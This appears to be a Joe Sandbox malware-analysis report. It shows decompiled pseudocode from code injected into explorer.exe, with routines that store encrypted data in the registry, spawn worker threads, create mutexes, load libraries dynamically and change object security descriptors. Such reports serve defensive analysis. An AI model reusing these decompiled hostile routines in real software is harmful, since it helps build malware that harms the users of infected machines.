0x0008bed3
0x0008bed3
0x0008bed7
0x0008bedc
0x0008bedc
0x0008bdad
0x0008bdb0
0x0008bdb7
0x0008bdb8
0x0008bdbf
0x0008bdc2
0x0008bdc9
0x0008bdcc
0x0008bdd7
0x0008bde2
0x00000000
0x00000000
0x00000000
0x0008bde4
0x0008bde4
0x0008bde7
0x0008bde8
0x0008bde9
0x0008bdea
0x0008bdeb
0x0008bdec
0x0008bded
0x0008bdee
0x0008bdf0
0x0008bdf1
0x0008bdf5
0x0008bdf6
0x0008be00
0x00000000
0x0008be06
0x0008be06
0x0008be0b
0x0008be0d
0x0008be0f
0x0008be10
0x0008be17
0x0008be1a
0x0008be21
0x0008be24
0x0008be27
0x0008be27
0x0008be2a
0x0008be2d
0x0008be2e
0x0008be32
0x0008be33
0x0008be38
0x0008be3e
0x00000000
0x00000000
0x0008be4a
0x0008be4e
0x00000000
0x00000000
0x0008be50
0x0008be56
0x0008be58
0x0008be61
0x00000000
0x00000000
0x0008be63
0x0008be68
0x0008be69
0x0008be6c
0x0008be6e
0x0008be77
0x00000000
0x00000000
0x0008be7c
0x0008be7e
0x0008be86
0x0008be86
0x0008be89
0x0008be91
0x00000000
0x0008be91
0x0008be00

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BE39
LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE44

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction ID: 8a8dff3e50a777aa36eb2557a5ec9411efcf3ba185eb1fbebad0df61dff2a8da
Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction Fuzzy Hash: F6513B71A00208EFEB24DF99D988ADEBBF8FF44701F15806AF604AB260D7749E44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008A076, Relevance: 3.1, APIs: 2, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0008A076(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D442( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092339(_t107 + __edx,  &_v2832);
					_t54 = E00092465(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E000885E5(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886C2(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E0009230B( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F4D2( &_v16, _t104);
						E0008EB03( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB70(_t106, _v20,  &_v328);
						_t73 = E00089AEF(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E00089781(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0x9e68c; // 0x14dfab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E000885FB( &_v12, 0xffffffff);
						}
						E000885FB( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x0008a083
0x0008a088
0x0008a08a
0x0008a08d
0x0008a1fc
0x0008a1fc
0x0008a1fc
0x00000000
0x0008a09d
0x0008a09d
0x0008a09f
0x00000000
0x00000000
0x0008a0a5
0x0008a0ae
0x0008a0b1
0x0008a0b2
0x0008a0ba
0x0008a0bd
0x0008a0c8
0x0008a0d8
0x0008a0dd
0x0008a0e0
0x0008a0e9
0x0008a0f1
0x0008a0f6
0x0008a0fb
0x0008a108
0x0008a10a
0x0008a111
0x0008a116
0x0008a119
0x0008a121
0x0008a12e
0x0008a133
0x0008a139
0x0008a142
0x0008a148
0x0008a14b
0x0008a14c
0x0008a15e
0x0008a16e
0x0008a17a
0x0008a17f
0x0008a182
0x0008a184
0x0008a18e
0x0008a1a9
0x0008a1ac
0x0008a1ae
0x0008a1c9
0x0008a1cc
0x0008a1ce
0x0008a1d0
0x0008a1d2
0x0008a1d2
0x0008a1d3
0x0008a1db
0x0008a1b0
0x0008a1b0
0x0008a1b2
0x0008a1b2
0x0008a1e4
0x0008a1ea
0x0008a1f1
0x00000000
0x0008a1f8
0x0008a0ff
0x00000000
0x0008a0ff

APIs

Part of subcall function 00092465: _ftol2_sse.MSVCRT ref: 000924C6

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1A9

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: e5404e69353aabcc0e44c67a3ced09299f08291ff97ced55e415ab065c1ac02c
Instruction ID: 9837c11a2a5db70154801c8a69749f9dd764b4d37476d82eb47b71c86f4ebc30
Opcode Fuzzy Hash: e5404e69353aabcc0e44c67a3ced09299f08291ff97ced55e415ab065c1ac02c
Instruction Fuzzy Hash: 55518072A00209AFDF10EF94CC45FDEBBB8BF05320F108166F555A7191EB749645CB51

Uniqueness

Uniqueness Score: -1.00%

Function 000898CF, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000898CF(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1dc
				_t73 = 0;
				if(E0008A501(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0x1461138
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0x1461138
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0x1461138
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0x1461138
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A4B3(0, 1);
									_t82 =  *0x9e770; // 0x1461138
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0x1461138
									_t30 = _t83 + _t113 + 4; // 0x146113c
									_t52 = CreateThread(_t73, _t73, E00089887, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0x1461138
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0x1461138
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0x1461138
										 *0x9e774 =  *0x9e774 + 1;
										E0008A51D( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0x1461138
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0x14df8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0x1461138
										_t37 = _t61 + 0xc; // 0x1461144
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E000885FB(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0x1461138
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1dc
									E0008A51D(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E000885E5(_t110);
								_t97 =  *0x9e770; // 0x1461138
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0x1461138
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0x1461138
								E000886C2( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0x14df8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0x1461138
							goto L7;
						}
						_t98 =  *0x9e770; // 0x1461138
						E0008982B(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0x1461138
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000898d2
0x000898d3
0x000898d4
0x000898dc
0x000898df
0x000898e6
0x000898ef
0x000898f8
0x000898ff
0x00089901
0x00089903
0x00089903
0x00089908
0x00089930
0x00089933
0x0008994d
0x00089953
0x00089993
0x00089997
0x0008999c
0x000899a0
0x000899a0
0x000899ac
0x000899b0
0x000899b8
0x000899be
0x000899c3
0x000899c9
0x000899cd
0x000899d5
0x000899e7
0x000899ec
0x000899f1
0x000899f4
0x000899f9
0x000899fe
0x00089a3a
0x00089a40
0x00089a46
0x00089a50
0x00089a55
0x00089a5b
0x00089a00
0x00089a04
0x00089a09
0x00089a0c
0x00089a11
0x00089a14
0x00089a18
0x00089a1f
0x00089a24
0x00089a2a
0x00089a32
0x00089a33
0x00089a33
0x00089a5d
0x00089a5d
0x00089a63
0x00089a69
0x00089a6c
0x00089a6e
0x00089a6e
0x00089955
0x00089959
0x0008995f
0x00089965
0x00089969
0x00089972
0x00000000
0x00000000
0x00089978
0x0008997c
0x00089989
0x0008998e
0x00000000
0x0008998e
0x00000000
0x00089933
0x0008990a
0x0008990f
0x00089910
0x00089919
0x00089946
0x00000000
0x00089946
0x0008991b
0x00089926
0x0008992b
0x00000000
0x00089935
0x00089935
0x00089938
0x00089939
0x00000000
0x00089941
0x000898f1
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530ae56c4b1e668da0092b5768f5bec1fb3d9945d5f2b76f05e9a63b7f4c4b50
Instruction ID: 6cd403ee8bd510f537b18fc82177b251fc2f6b8552ea639a777c6b464c43f836
Opcode Fuzzy Hash: 530ae56c4b1e668da0092b5768f5bec1fb3d9945d5f2b76f05e9a63b7f4c4b50
Instruction Fuzzy Hash: 48515F71614640DFEB69EFA8EC80876F7E9FB49314758492EE48683365CA35EC02CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0008A6EB, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0008A6EB(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A67D(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x14df8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E000885FB( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E000885E5(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x0008a6ee
0x0008a6ef
0x0008a6f0
0x0008a6f4
0x0008a6f6
0x0008a6fb
0x0008a70b
0x0008a70f
0x0008a799
0x0008a799
0x0008a79b
0x0008a79d
0x0008a79f
0x0008a79f
0x0008a715
0x0008a723
0x0008a727
0x0008a77f
0x0008a77f
0x0008a785
0x0008a78a
0x0008a792
0x0008a798
0x00000000
0x0008a78a
0x0008a729
0x0008a72d
0x0008a732
0x0008a734
0x0008a73a
0x00000000
0x00000000
0x0008a73e
0x0008a741
0x0008a742
0x0008a748
0x0008a749
0x0008a74a
0x0008a76f
0x0008a751
0x0008a7a3
0x00000000
0x00000000
0x0008a7a5
0x0008a7a8
0x0008a7ae
0x0008a7b0
0x0008a7b0
0x0008a7b8
0x0008a7bb
0x00000000
0x0008a7bb
0x0008a759
0x0008a75c
0x0008a760
0x0008a762
0x0008a765
0x0008a76a
0x0008a76e
0x0008a76e
0x00000000
0x0008a76f
0x0008a6fd
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA98,00000000,0008F8F7,000AEFE0,0009B98C,00000000,0009B98C,00000000,00000000,00000615), ref: 0008A775
CloseHandle.KERNELBASE(00000000,?,0008FA98,00000000,0008F8F7,000AEFE0,0009B98C,00000000,0009B98C,00000000,00000000,00000615,0000034A,00000000,014DFD20,00000400), ref: 0008A7B8

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 6f3895e4127ed0ae80d7f303df249604c29b1237ac828fd62f8796987f3cf2ff
Instruction ID: 25622088460c6087de3ec147c31aac90522c2eb645a19260c204c492a7e9e9de
Opcode Fuzzy Hash: 6f3895e4127ed0ae80d7f303df249604c29b1237ac828fd62f8796987f3cf2ff
Instruction Fuzzy Hash: 58218D76604209AFEB51EF68CC84FAA7BFCBB15740F24406BB945DB201EA74DA409B91

Uniqueness

Uniqueness Score: -1.00%

Function 00081521, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00081521(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E00089187(_t3, 0);
							E000885A3( &_v8);
							_t7 = E000885E5(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E000885E5(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915EE(0x881e3, 0x881ec);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1FE(0x9bd20, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x00081524
0x0008152b
0x00081531
0x00081538
0x000815ed
0x000815ed
0x000815ed
0x0008153e
0x00081541
0x00081547
0x0008154e
0x00000000
0x00081554
0x00081559
0x0008155e
0x00081563
0x00000000
0x00081569
0x00081575
0x0008157a
0x00081584
0x00081589
0x00081591
0x0008159f
0x000815a5
0x000815aa
0x000815b0
0x000815b2
0x000815b8
0x000815be
0x000815ca
0x000815d0
0x000815d1
0x000815d8
0x000815de
0x000815e3
0x000815e8
0x000815b4
0x000815b4
0x00000000
0x000815b4
0x00081593
0x00081593
0x00081595
0x00081595
0x00081595
0x00081591
0x00081563
0x0008154e
0x000815f2

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000856FA), ref: 0008152B
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000856FA), ref: 00081541

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: 3c2893f5111daae45557300751a58e420a5f403385d6287cdc942c18eb9a8ac6
Instruction ID: 76ab61248cb3ebbed31960de556cf067885e7c63dce96342fda626e2f339c0b6
Opcode Fuzzy Hash: 3c2893f5111daae45557300751a58e420a5f403385d6287cdc942c18eb9a8ac6
Instruction Fuzzy Hash: 6111B970604A42EAFB50FB75FC059A63AE8FFD17A0760412BE592C61D1FE74C9018711

Uniqueness

Uniqueness Score: -1.00%

Function 0008BCBC, Relevance: 3.1, APIs: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0008BCBC(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1f8
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895C2(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0x14dfab8, executed
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0x14dfab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0x14dfab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0x14dfab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885B6( &_v24);
				return _t39;
			}

0x0008bcc3
0x0008bcc6
0x0008bcd1
0x0008bcd4
0x0008bcd7
0x0008bcda
0x0008bcdd
0x0008bce3
0x0008bce7
0x0008bcea
0x0008bceb
0x0008bced
0x0008bcee
0x0008bcfb
0x0008bd00
0x0008bd04
0x0008bd08
0x0008bd09
0x0008bd0e
0x0008bd19
0x0008bd1b
0x0008bd1e
0x0008bd23
0x0008bd24
0x0008bd25
0x0008bd26
0x0008bd28
0x0008bd2a
0x0008bd33
0x0008bd35
0x0008bd35
0x0008bd33
0x0008bd36
0x0008bd3f
0x0008bd3f
0x0008bd46
0x0008bd51

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,0008325B,?,?,00000000,?,?,?,00085714), ref: 0008BCF3
SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,0008325B,?,?,00000000,?,?,?,00085714), ref: 0008BD2B

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$ConvertInfoString
String ID:
API String ID: 3187949549-0
Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction ID: 001d49ceb70d8446ff020721084f12b13b13be0303ccbbb620e15aa3367a86e5
Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction Fuzzy Hash: C911F872A00219BBDB10EF95DC49EEEBBBCFF18750F10416AF545E7251EB709A018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008E1FE, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0008E1FE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895A8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E1B3(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885A3( &_v8);
				return _t25;
			}

0x0008e201
0x0008e204
0x0008e20a
0x0008e20c
0x0008e211
0x0008e213
0x0008e21d
0x0008e21e
0x0008e22d
0x0008e220
0x0008e220
0x0008e220
0x0008e231
0x0008e238
0x0008e23e
0x0008e23e
0x0008e243
0x0008e24e

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA20), ref: 0008E220
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA20), ref: 0008E22D

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction ID: 2336290dd98dabc25e18f7a79f1312269207d3c0219d1a772d0d688987e78d2c
Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction Fuzzy Hash: 90F0A732700124ABE744BBADEC858DAB3ECBF95394714412AF506D3251DEB4EE4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00082C82, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00082C82(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B742(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BBCF(_t70) == 0) {
					_t23 = E00082B97( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C57( &_v1084, __eflags);
					} else {
						E0008B054(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892C6( &_v1084);
						E000885B6( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0x14df8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892C6( &_v564);
						E000885B6( &_v8);
					} else {
						_t71 = E00082C57( &_v44, _t78);
					}
					E000885B6( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B2AB(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B2AB(_t71) == 0) {
						E000885FB( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x00082c91
0x00082c93
0x00082c96
0x00082c9c
0x00082ca5
0x00082d29
0x00082d2e
0x00082d2f
0x00082d31
0x00082d82
0x00082d33
0x00082d39
0x00082d43
0x00082d48
0x00082d4d
0x00082d50
0x00082d51
0x00082d56
0x00082d57
0x00082d58
0x00082d5f
0x00082d60
0x00082d6d
0x00082d73
0x00082d78
0x00082ca7
0x00082cac
0x00082cb1
0x00082cbf
0x00082cc3
0x00082cc8
0x00082cce
0x00082cd0
0x00082ce0
0x00082ce5
0x00082cea
0x00082ced
0x00082cee
0x00082cf3
0x00082cf4
0x00082cf5
0x00082d02
0x00082d08
0x00082cd2
0x00082cd7
0x00082cd7
0x00082d14
0x00082d19
0x00082d86
0x00082d89
0x00082d90
0x00082d94
0x00082d9c
0x00082daf
0x00082db4
0x00082db8
0x00082d9c
0x00082dbd

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082D94

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 68c77f01e8c6780dfe701307dc001a3c2438e76daa96a70f931700e9baec779b
Instruction ID: db32385398968dca737dab0100a1bc30185c5e46178c30c23a01bed678604ce8
